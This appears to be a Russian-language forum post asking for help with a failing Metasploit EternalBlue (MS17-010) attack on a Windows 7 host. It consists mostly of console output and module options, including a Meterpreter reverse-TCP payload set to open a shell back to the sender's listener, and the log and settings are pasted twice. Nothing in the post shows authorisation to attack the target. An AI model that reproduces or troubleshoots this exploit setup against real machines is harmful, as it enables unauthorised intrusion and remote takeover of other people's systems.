Здравствуйте господа, помогите уже что только не делал не чего не выхотит. столкнулся с такой проблемай, есть комп win7 открытый 445 порт, сканировал MSF, NESSUS все говорят тачка уязвима. Запускаю exploit/windows/smb/ms17_010_eternalblue нажимаю run. и вот что появлеяться
[*] Started reverse TCP handler on 192.168.0.105:4444
[+] 10.16.116.39:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.16.116.39:445 - Connecting to target for exploitation.
[+] 10.16.116.39:445 - Connection established for exploitation.
[+] 10.16.116.39:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.16.116.39:445 - CORE raw buffer dump (38 bytes)
[*] 10.16.116.39:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 10.16.116.39:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 10.16.116.39:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 10.16.116.39:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.16.116.39:445 - Trying exploit with 12 Groom Allocations.
[*] 10.16.116.39:445 - Sending all but last fragment of exploit packet
[-] 10.16.116.39:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
Вот опций
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.16.116.39 yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.105 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
[*] Started reverse TCP handler on 192.168.0.105:4444
[+] 10.16.116.39:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.16.116.39:445 - Connecting to target for exploitation.
[+] 10.16.116.39:445 - Connection established for exploitation.
[+] 10.16.116.39:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.16.116.39:445 - CORE raw buffer dump (38 bytes)
[*] 10.16.116.39:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 10.16.116.39:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 10.16.116.39:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 10.16.116.39:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.16.116.39:445 - Trying exploit with 12 Groom Allocations.
[*] 10.16.116.39:445 - Sending all but last fragment of exploit packet
[-] 10.16.116.39:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
Вот опций
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.16.116.39 yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.105 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
